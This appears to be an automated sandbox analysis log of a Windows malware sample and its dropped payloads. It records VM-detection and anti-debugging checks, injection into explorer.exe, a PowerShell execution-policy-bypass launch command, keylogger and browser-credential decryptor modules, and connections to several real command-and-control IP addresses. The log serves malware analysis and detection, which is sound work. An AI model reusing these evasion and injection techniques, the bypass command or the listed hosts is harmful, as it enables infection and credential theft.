                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595265
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595047
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 594828
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 594633
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 594437
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 594250
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 593875
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 593594
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 593359
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 593047
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 592797
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 592562
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 592344
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 592140
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 591797
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 591344
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 591062
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 590828
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 590640
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 590406
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 590140
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 589922
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 589724
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 589599
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 589156
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588984
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588765
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588578
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588390
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588226
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 588062
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 587873
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 587640
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 587422
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 587265
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 586890
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 586594
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 586375
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 586109
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 585781
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 585422
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 585156
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 584812
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 584276
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583949
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583728
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583515
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583234
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 583062
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 582812
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 582578
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 582297
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581890
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581703
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581469
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581312
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 581094
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580906
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580716
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580531
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580312
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 580015
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 579609
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 579437
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 579276
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 579078
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578931
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578703
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578538
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578328
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 578125
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577953
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577791
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577500
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577187
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 577015
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576856
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576665
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576515
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576297
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 576015
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 575844
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 575656
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 575523
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 575359
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 574969
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 574750
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 574453
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 574181
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 573781
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 573469
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 573219
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 572828
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 572390
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 572203
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 572001
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 571797
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 571500
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 571297
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 571047
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 570859
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 570713
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 570539
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 570156
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569982
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569812
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569646
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569429
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 569234
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 568890
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 568422
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 568156
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 567687
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 567453
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 567265
                      Source: explorer.exe, 00000002.00000002.3165274838.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                      Source: explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000018.00000002.3202002014.0000000005876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Service_{B955B2CC07A01546086603}.exe, 00000036.00000002.2852409138.000001E4C0388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\N
                      Source: xj40xovMsm.exe, 00000000.00000002.1762970728.0000020233166000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dc9ea4f458eb80<
                      Source: xj40xovMsm.exe, 00000000.00000002.1762970728.0000020233166000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000000.00000002.1762970728.00000202330DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3162050946.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3162050946.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3148739783.0000021478456000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D7E000.00000004.00000020.00020000.00000000.sdmp, xj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000002.00000000.1788240318.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                      Source: Service_{B955B2CC07A01546086603}.exe, 00000036.00000002.2852409138.000001E4C0388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yh
                      Source: svchost.exe, 00000003.00000002.3140975194.0000021472E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2514963704.0000000001192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C030000.00000004.00000020.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.3034068936.0000000004FB4000.00000004.00000020.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3133485073.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD0
                      Source: explorer.exe, 00000002.00000000.1787337320.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                      Source: explorer.exe, 00000002.00000000.1787337320.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                      Source: svchost.exe, 00000018.00000002.3136390098.00000000008EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\>
                      Source: explorer.exe, 00000002.00000002.3165274838.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 53A5.tmp.update.exe.2.drBinary or memory string: vmware
                      Source: explorer.exe, 00000002.00000000.1788240318.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                      Source: 5E16.tmp.aaa.exe, 00000013.00000002.3134175097.0000000000C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUA
                      Source: explorer.exe, 00000002.00000000.1787337320.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C030000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uFOk6EgWWrRKe+c6+Wq31+O7doj9nS7CLPecufdsjt8XwsOV3O2oGPtIRHnl9NCN4vAJ4cQcctbHoaqSCvyy7C/hGFsRJJTd+PU07Y
                      Source: 4336.tmp.Server.exe, 00000006.00000002.3221091407.00000000052CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{||||{{{{{{||||||||||||||||||||||||||||||||||||||
                      Source: explorer.exe, 00000002.00000000.1785022693.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                      Source: 4336.tmp.Server.exe.2.drBinary or memory string: VMwareVBox
                      Source: 3CBD.tmp.Installer.exe, 00000005.00000002.2137916265.000000001C0CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MY
                      Source: explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: explorer.exe, 00000002.00000000.1787337320.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                      Source: explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeAPI call chain: ExitProcess graph end nodegraph_0-14177
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeAPI call chain: ExitProcess graph end nodegraph_0-16463
                      Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_2-49142
                      Source: C:\Windows\System32\relog.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\relog.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\relog.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\relog.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\relog.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\relog.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\relog.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeCode function: 14_2_010F2D4C CheckRemoteDebuggerPresent,14_2_010F2D4C
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_05110B20 LdrInitializeThunk,6_2_05110B20
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A18E93C IsDebuggerPresent,__crtUnhandledException,GetCurrentProcess,TerminateProcess,0_2_00007FF68A18E93C
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A196AC8 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00007FF68A196AC8
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CB167C CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,FindCloseChangeNotification,OpenThread,SuspendThread,GetThreadContext,SetThreadContext,CloseHandle,FindCloseChangeNotification,2_2_08CB167C
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A18384C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileW,CloseHandle,VirtualFree,0_2_00007FF68A18384C
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A19118C GetProcessHeap,0_2_00007FF68A19118C
                      Source: C:\Windows\System32\relog.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\relog.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\relog.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A195CD8 SetUnhandledExceptionFilter,0_2_00007FF68A195CD8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A195A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF68A195A00
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CBD0B8 SetUnhandledExceptionFilter,2_2_08CBD0B8
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3EF290 SetUnhandledExceptionFilter,2_2_0F3EF290
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3E31A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0F3E31A4
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA345CD8 SetUnhandledExceptionFilter,47_2_00007FF6AA345CD8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA345A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_00007FF6AA345A00
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B15A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00007FF7C9B15A00
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B15CD8 SetUnhandledExceptionFilter,52_2_00007FF7C9B15CD8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE495CD8 SetUnhandledExceptionFilter,53_2_00007FF7AE495CD8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE495A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FF7AE495A00
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07D5A00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00007FF7C07D5A00
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07D5CD8 SetUnhandledExceptionFilter,55_2_00007FF7C07D5CD8
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\explorer.exeFile created: 53A5.tmp.update.exe.2.drJump to dropped file
                      Source: C:\Windows\explorer.exeNetwork Connect: 64.31.40.18 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 75.119.203.100 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 192.3.140.185 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.232.249.204 7707
                      Source: 5E16.tmp.aaa.exe.2.dr, DInvokeCore.csReference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
                      Source: 5E16.tmp.aaa.exe.2.dr, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                      Source: 4336.tmp.Server.exe.2.dr, Keylogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                      Source: 4BC4.tmp.Client.exe.2.dr, Decryptor.csReference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
                      Source: 4BC4.tmp.Client.exe.2.dr, Decryptor.csReference to suspicious API methods: WinApi.GetProcAddress(hNss3, "NSS_Init")
                      Source: C:\Windows\System32\relog.exeMemory allocated: C:\Windows\explorer.exe base: C350000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\relog.exeMemory allocated: C:\Windows\explorer.exe base: 8B90000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
                      Source: C:\Windows\System32\relog.exeMemory protected: C:\Windows\explorer.exe base: 8B90000 protect: page execute readJump to behavior
                      Source: C:\Windows\System32\relog.exeMemory protected: C:\Windows\explorer.exe base: C350000 protect: page execute readJump to behavior
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CBC55C CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,2_2_08CBC55C
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A183084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,0_2_00007FF68A183084
